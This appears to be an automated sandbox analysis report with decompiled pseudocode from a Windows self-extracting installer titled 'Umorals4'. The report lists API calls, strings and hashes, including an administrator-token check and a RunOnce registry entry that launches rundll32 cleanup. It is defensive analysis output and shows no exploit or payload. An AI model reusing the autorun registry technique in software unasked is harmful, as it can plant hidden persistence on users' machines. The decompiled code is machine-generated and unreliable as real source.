				signed int _t38;
				void* _t41;
				signed int _t44;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				intOrPtr _t57;
				void* _t58;
				long _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t71;
				signed int _t75;
				intOrPtr* _t79;
				long _t83;
				intOrPtr* _t84;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr* _t92;
				signed int _t96;

				_t82 = __edx;
				_t38 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t38 ^ _t96;
				_v588 = __ecx;
				_t91 = "LoadString() Error.  Could not load string resource.";
				_t75 = 0xd;
				_t41 = memcpy( &_v64, _t91, _t75 << 2);
				_t87 = _t91 + _t75 + _t75;
				_v584 = _t41;
				_v580 = _a8;
				asm("movsb");
				if(( *0xf38958 & 0x00000001) != 0) {
					_t44 = 1;
				} else {
					_t71 = 0;
					_v576 = 0;
					LoadStringA( *0xf39164, _t82,  &_v576, 0x200);
					if(_v576 != 0) {
						_t92 = _v580;
						_t79 =  &_v576;
						_t82 = _t79 + 1;
						if(_t92 == 0) {
							_t91 = _v584;
							if(_t91 == 0) {
								do {
									_t48 =  *_t79;
									_t79 = _t79 + 1;
								} while (_t48 != 0);
								_t91 = _t79 - _t82 + 1;
								_t49 = LocalAlloc(0x40, _t91);
								_t87 = _t49;
								if(_t87 == 0) {
									goto L6;
								} else {
									_t82 = _t91;
									_t81 = _t87;
									E00F31485(_t87, _t91,  &_v576);
									goto L24;
								}
							} else {
								do {
									_t57 =  *_t79;
									_t79 = _t79 + 1;
								} while (_t57 != 0);
								_t81 = _t79 - _t82;
								_t83 = _t91;
								_t88 = _t83 + 1;
								do {
									_t58 =  *_t83;
									_t83 = _t83 + 1;
								} while (_t58 != 0);
								_t82 = _t83 - _t88;
								_t60 = _t81 + 0x64 + _t83 - _t88;
								_v580 = _t60;
								_t49 = LocalAlloc(0x40, _t60);
								_t87 = _t49;
								if(_t87 == 0) {
									goto L6;
								} else {
									E00F31524(_t87, _v580,  &_v576, _t91);
									goto L24;
								}
							}
						} else {
							do {
								_t63 =  *_t79;
								_t79 = _t79 + 1;
							} while (_t63 != 0);
							_t81 = _t79 - _t82;
							_t84 = _v584;
							_t89 = _t84 + 1;
							do {
								_t64 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t64 != 0);
							_t82 = _t84 - _t89;
							_t90 = _t92 + 1;
							do {
								_t65 =  *_t92;
								_t92 = _t92 + 1;
							} while (_t65 != 0);
							_t91 = _t92 - _t90 + 0x64 + _t82 + _t81;
							_t49 = LocalAlloc(0x40, _t92 - _t90 + 0x64 + _t82 + _t81);
							_t87 = _t49;
							if(_t87 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00F31524(_t87, _t91,  &_v576, _v584);
								L24:
								MessageBeep(_a12);
								if(E00F3671D(_t71, _t82) != 0 && E00F366C2(_t81, _t81) != 0) {
									_t71 = 0x180000;
								}
								_t54 = MessageBoxA(_v588, _t87, "Umorals4", _t71);
								_t91 = _t54;
								LocalFree(_t87);
								_t44 = _t54;
							}
						}
					} else {
						if(E00F3671D(0, _t82) != 0 && E00F366C2(0, 0) != 0) {
							_t71 = 0x180000;
						}
						_t49 = MessageBoxA(_v588,  &_v64, "Umorals4", _t71);
						L6:
						_t44 = _t49 | 0xffffffff;
					}
				}
				return E00F36C20(_t44, _t71, _v8 ^ _t96, _t82, _t87, _t91);
			}

0x00f34327
0x00f34332
0x00f34339
0x00f3434c
0x00f34352
0x00f34359
0x00f3435a
0x00f3435a
0x00f3435c
0x00f34365
0x00f3436b
0x00f3436c
0x00f3451f
0x00f34372
0x00f3437d
0x00f34387
0x00f3438d
0x00f34399
0x00f343d7
0x00f343dd
0x00f343e3
0x00f343e8
0x00f34449
0x00f34451
0x00f344a1
0x00f344a1
0x00f344a3
0x00f344a4
0x00f344aa
0x00f344b0
0x00f344b6
0x00f344ba
0x00000000
0x00f344c0
0x00f344c6
0x00f344c9
0x00f344cb
0x00000000
0x00f344cb
0x00f34453
0x00f34453
0x00f34453
0x00f34455
0x00f34456
0x00f3445a
0x00f3445c
0x00f3445e
0x00f34461
0x00f34461
0x00f34463
0x00f34464
0x00f34468
0x00f3446d
0x00f34472
0x00f34478
0x00f3447e
0x00f34482
0x00000000
0x00f34488
0x00f34497
0x00000000
0x00f3449c
0x00f34482
0x00f343ea
0x00f343ea
0x00f343ea
0x00f343ec
0x00f343ed
0x00f343f1
0x00f343f3
0x00f343f9
0x00f343fc
0x00f343fc
0x00f343fe
0x00f343ff
0x00f34403
0x00f34405
0x00f34408
0x00f34408
0x00f3440a
0x00f3440b
0x00f34416
0x00f3441b
0x00f34421
0x00f34425
0x00000000
0x00f34427
0x00f34427
0x00f3443c
0x00f344d0
0x00f344d3
0x00f344e0
0x00f344ec
0x00f344ec
0x00f3450a
0x00f34511
0x00f34513
0x00f34519
0x00f34519
0x00f34425
0x00f3439b
0x00f343a2
0x00f343ae
0x00f343ae
0x00f343c9
0x00f343cf
0x00f343cf
0x00f343cf
0x00f34399
0x00f34530

APIs

LoadStringA.USER32 ref: 00F3438D
MessageBoxA.USER32 ref: 00F343C9
LocalAlloc.KERNEL32(00000040,?), ref: 00F3441B
LocalAlloc.KERNEL32(00000040,?), ref: 00F34478
LocalAlloc.KERNEL32(00000040,?), ref: 00F344B0
MessageBeep.USER32(00000000), ref: 00F344D3
MessageBoxA.USER32 ref: 00F3450A
LocalFree.KERNEL32(00000000), ref: 00F34513

Part of subcall function 00F3671D: GetVersionExA.KERNEL32(?,00000000,?), ref: 00F3676C
Part of subcall function 00F3671D: GetSystemMetrics.USER32 ref: 00F367A5
Part of subcall function 00F3671D: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F367CA
Part of subcall function 00F3671D: RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,?,0000000C), ref: 00F367F2
Part of subcall function 00F3671D: RegCloseKey.ADVAPI32(?), ref: 00F36800

Strings

LoadString() Error. Could not load string resource., xrefs: 00F34352
Umorals4, xrefs: 00F343BD, 00F344FE

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$Umorals4
API String ID: 3244514340-100266132
Opcode ID: da36609e851109a3c5209bcbb3b98547b8e6a74127904d2501025745e3d97a7b
Instruction ID: 7fec1cb4a3bffbb088b94597a70a8d204960c56bf38687b01910af58ac7f1398
Opcode Fuzzy Hash: da36609e851109a3c5209bcbb3b98547b8e6a74127904d2501025745e3d97a7b
Instruction Fuzzy Hash: 63512772D00219ABCF219F24CC48BAA7B75EF81334F1441A4ED49A7251DB35AE45FF60

Uniqueness

Uniqueness Score: -1.00%

Function 00F325DB, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00F325DB(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00F3158C( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00F364E7( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00F364E7(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xf31111, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00F31485(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00F36C20(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00f325db
0x00f325e6
0x00f325ed
0x00f325f2
0x00f325f5
0x00f325f8
0x00f325fa
0x00f32600
0x00f32605
0x00f3271a
0x00000000
0x00f3260b
0x00f3260b
0x00f32617
0x00f3262a
0x00f32630
0x00f32635
0x00f3263d
0x00f3271f
0x00f32721
0x00000000
0x00f32643
0x00f32645
0x00f32712
0x00000000
0x00f3264b
0x00f3264b
0x00f32654
0x00f32660
0x00f3266b
0x00f32673
0x00f32699
0x00f3272b
0x00f32731
0x00f32735
0x00f3269f
0x00f326c2
0x00f326c4
0x00f326cd
0x00f326fa
0x00f326fd
0x00000000
0x00000000
0x00f326cf
0x00f326e0
0x00f326f4
0x00000000
0x00f326e2
0x00f326e8
0x00f326ed
0x00f326ff
0x00f32701
0x00f32701
0x00f326e0
0x00f326cd
0x00f32708
0x00f32727
0x00f32729
0x00000000
0x00000000
0x00f32729
0x00f32699
0x00f32645
0x00f3263d
0x00f3274d

APIs

CharUpperA.USER32(FDACA2C3,00000000,00000000,00000000), ref: 00F32610
CharNextA.USER32(00000001), ref: 00F3261D
CharNextA.USER32(00000000), ref: 00F32624
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32691
RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,00000000,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326BA
ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326D8
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32708
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00F32712
GetSystemDirectoryA.KERNEL32 ref: 00F32721

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F3264C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: d7d55a114caa406f8f2fc8d35203c15332989455b98a80bd6945a15973e0e24b
Instruction ID: e4d718d097d9f68873f4c593fc22d73714d06cb135f52ba32aea2b361d748bd1
Opcode Fuzzy Hash: d7d55a114caa406f8f2fc8d35203c15332989455b98a80bd6945a15973e0e24b
Instruction Fuzzy Hash: 0941A3B1E0012CAFDB649B65DC89AEABBBDFF55730F004095F585D2110DB708E85EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F320AF, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00F320AF() {
				signed int _v8;
				void _v267;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				intOrPtr _t34;
				void* _t39;
				intOrPtr* _t43;
				void* _t46;
				void* _t48;
				void* _t50;
				signed int _t52;

				_t20 =  *0xf38000; // 0xfdaca2c3
				_t21 = _t20 ^ _t52;
				_v8 = _t20 ^ _t52;
				if( *0xf38570 != 0) {
					_push(_t39);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t48);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t50);
							_v268 = 0;
							memset( &_v267, 0, 0x103);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00F364E7( &_v268, 0x104, 0xf31111);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E00F31524( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t43 =  &_v836;
							_t46 = _t43 + 1;
							_pop(_t50);
							do {
								_t34 =  *_t43;
								_t43 = _t43 + 1;
							} while (_t34 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t43 - _t46 + 1);
						}
						_t21 = RegCloseKey(_v840);
						_pop(_t48);
					}
					_pop(_t39);
				}
				return E00F36C20(_t21, _t39, _v8 ^ _t52, _t46, _t48, _t50);
			}

0x00f320ba
0x00f320bf
0x00f320c1
0x00f320cb
0x00f320d1
0x00f320f3
0x00f320f9
0x00f3210c
0x00f32128
0x00f3212e
0x00f3213a
0x00f32142
0x00f3215f
0x00f3216e
0x00f3216e
0x00f32173
0x00f3218c
0x00f32194
0x00f3219a
0x00f3219d
0x00f3219e
0x00f3219e
0x00f321a0
0x00f321a1
0x00f321c0
0x00f321c0
0x00f321cc
0x00f321d2
0x00f321d2
0x00f321d3
0x00f321d3
0x00f321e1

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F320EB
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,?), ref: 00F32120
memset.MSVCRT ref: 00F32142
GetSystemDirectoryA.KERNEL32 ref: 00F32157
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,00000001), ref: 00F321C0
RegCloseKey.ADVAPI32(?), ref: 00F321CC

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F3217F
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F32173
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F320E1
wextract_cleanup0, xrefs: 00F320C4, 00F32115, 00F321B5

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-2554356261
Opcode ID: 11760d8832c4ee9a9e2728865d7754c1ba7b7b0d32923b9489802d72de75ed59
Instruction ID: eba5186cf2ab9872c47ec71da2b4a3d4ee82f16b6b3bf76ee67bc512b9b87a14
Opcode Fuzzy Hash: 11760d8832c4ee9a9e2728865d7754c1ba7b7b0d32923b9489802d72de75ed59
Instruction Fuzzy Hash: A131E8B1E0021CABDB65DB21DC45FEA777CEB44374F0000E5B54DE6141DA749F85EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00F32FA0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F32FA0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xf385c4 == 0) {
						 *0xf385d4 = SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xf385c4 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00F34239(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xf39044);
					SetWindowTextA(_t33, "Umorals4");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xf39040 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00F32F60);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00f32fa8
0x00f32fab
0x00f33053
0x00f3306c
0x00f33071
0x00f33071
0x00f3307b
0x00000000
0x00f3307b
0x00f32fb1
0x00f32fb2
0x00f32fd2
0x00f32fd2
0x00f32fd4
0x00f32fd7
0x00f32fdd
0x00000000
0x00f32fdf
0x00f32fb4
0x00f32fb9
0x00f32fe7
0x00f32fed
0x00f32ff4
0x00f33006
0x00f33012
0x00f33019
0x00f33027
0x00f3303a
0x00f3303f
0x00000000
0x00f33049
0x00f32fbc
0x00000000
0x00000000
0x00f32fc6
0x00f32fd0
0x00000000
0x00000000
0x00000000
0x00f32fd0
0x00f32fc8
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 00F32FD7
GetDesktopWindow.USER32 ref: 00F32FE7
SetDlgItemTextA.USER32 ref: 00F33006
SetWindowTextA.USER32(?,Umorals4), ref: 00F33012
SetForegroundWindow.USER32(?), ref: 00F33019
GetDlgItem.USER32 ref: 00F33021
GetWindowLongA.USER32 ref: 00F3302C
SetWindowLongA.USER32(00000000,000000FC,00F32F60), ref: 00F3303F
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F33066

Strings

Umorals4, xrefs: 00F3300C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: Umorals4
API String ID: 3785188418-264535404
Opcode ID: 6fb91c2e5a435e1adb718fff5972dc23eb88f422f3eeaaeb649e962332b9c9ef
Instruction ID: 11ff30e61eb57cdf7d1901360ece9162631f5c2cb93f739f0cfc93bd894240e8
Opcode Fuzzy Hash: 6fb91c2e5a435e1adb718fff5972dc23eb88f422f3eeaaeb649e962332b9c9ef
Instruction Fuzzy Hash: 0A21A231608218ABCB51AF35EC0CF6A3AB5FB49735F104114F851A11E0CBB89641FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F316B6, Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00F316B6(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				void* _v24;
				long _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t23 ^ _t53;
				_t25 =  *0xf38108; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00F36C20(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00F315FC( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xf38108 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v24) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v24, _t50, 0, 0,  &_v28) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v24);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v28);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v24, _t50, _t52, _v28,  &_v28) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xf38108 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x00f316b6
0x00f316b6
0x00f316be
0x00f316c5
0x00f316c8
0x00f316d1
0x00f316d3
0x00f316d9
0x00f316da
0x00f316dd
0x00f316e2
0x00f317dc
0x00f317eb
0x00f317eb
0x00f316f2
0x00f317cb
0x00f317d0
0x00f317d2
0x00f317d2
0x00000000
0x00f317d0
0x00f3170d
0x00000000
0x00000000
0x00f31725
0x00f317bd
0x00f317c0
0x00f317c6
0x00000000
0x00f3173a
0x00f3173a
0x00f31745
0x00f31749
0x00f317bc
0x00f317bc
0x00000000
0x00f317bc
0x00f3175f
0x00f317b5
0x00f317b6
0x00000000
0x00f31781
0x00f31783
0x00f317ac
0x00f317af
0x00000000
0x00f317af
0x00f31785
0x00f31785
0x00f31788
0x00f31797
0x00f31798
0x00f3179d
0x00000000
0x00000000
0x00000000
0x00f3179f
0x00f317a4
0x00f317a9
0x00000000
0x00f317a9
0x00f3175f

APIs

Part of subcall function 00F315FC: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F316F0), ref: 00F31628
Part of subcall function 00F315FC: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3163A
Part of subcall function 00F315FC: AllocateAndInitializeSid.ADVAPI32(00F316F0,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F316F0), ref: 00F31663
Part of subcall function 00F315FC: FreeSid.ADVAPI32(?,?,?,?,00F316F0), ref: 00F31691
Part of subcall function 00F315FC: FreeLibrary.KERNEL32(00000000,?,?,?,00F316F0), ref: 00F31698

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F316FE
OpenProcessToken.ADVAPI32(00000000), ref: 00F31705
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F3171D
GetLastError.KERNEL32 ref: 00F3172B
LocalAlloc.KERNEL32(00000000,?,?), ref: 00F3173F
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F31757
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F31777
EqualSid.ADVAPI32(00000004,?), ref: 00F3178D
FreeSid.ADVAPI32(?), ref: 00F317AF
LocalFree.KERNEL32(00000000), ref: 00F317B6
CloseHandle.KERNEL32(?), ref: 00F317C0

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: b632dd593c56ed6a73088c2e40744d59acd36cb1a66892d64cc2fbb357148ecf
Instruction ID: 8a487a350c746027881fb2fb0da6624483195bd3037618d3acbd27eb73c0b194
Opcode Fuzzy Hash: b632dd593c56ed6a73088c2e40744d59acd36cb1a66892d64cc2fbb357148ecf
Instruction Fuzzy Hash: F9314CB5E0020DAFDB209FA6DC88AAFBBB9FB04371F144129F945D2150DB349901EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F34538, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F34538(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				void* __ebx;
				long _t4;
				void* _t12;
				CHAR* _t15;
				void* _t16;
				long _t17;

				_t15 = __ecx;
				_t12 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t17 = _t4;
				if(_t17 <= _a4 && _t12 != 0) {
					if(_t17 != 0) {
						_t16 = LockResource(LoadResource(0, FindResourceA(0, _t15, 0xa)));
						if(_t16 == 0) {
							goto L3;
						}
						E00F36F15(_t12, _t12, _a4, _t16, _t17);
						FreeResource(_t16);
						return _t17;
					}
					L3:
					return 0;
				}
				return _t4;
			}

0x00f34542
0x00f34544
0x00f34552
0x00f34558
0x00f3455d
0x00f34565
0x00f34586
0x00f3458a
0x00000000
0x00000000
0x00f34592
0x00f3459b
0x00000000
0x00f345a1
0x00f34567
0x00000000
0x00f34567
0x00f345a7

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34570
LoadResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34579
LockResource.KERNEL32(00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34580
FreeResource.KERNEL32(00000000,?,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F3459B

Strings

TITLE, xrefs: 00F34546, 00F3456D
Umorals4, xrefs: 00F34591

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Find$FreeLoadLockSizeof
String ID: TITLE$Umorals4
API String ID: 468261009-4215533847
Opcode ID: fbd1476621a6d9143462483ccc87ce8e546a13633123cd2a0096a1f3d483e6a0
Instruction ID: d0097659ff6dfbb133eb263d943598814cd4338c6c496cfa243048687abedf6f
Opcode Fuzzy Hash: fbd1476621a6d9143462483ccc87ce8e546a13633123cd2a0096a1f3d483e6a0
Instruction Fuzzy Hash: 9A01A473A002547BE7612BA6AC4DF3B3A6DDBD5BB2F084014FE49C6180CA64AC10B672

Uniqueness

Uniqueness Score: -1.00%

Function 00F332E0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F332E0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00F34239(_t24, _t12);
					SetWindowTextA(_t24, "Umorals4");
					SetDlgItemTextA(_t24, 0x838,  *0xf39444);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xf3921c = 1;
					goto L8;
				}
				return 0;
			}

0x00f332e9
0x00f332ec
0x00f33366
0x00f3336c
0x00000000
0x00f3336e
0x00f332ee
0x00f332f3
0x00f33328
0x00f3332e
0x00f33335
0x00f33340
0x00f33352
0x00f33359
0x00000000
0x00f33359
0x00f332f6
0x00f332fc
0x00f33302
0x00000000
0x00000000
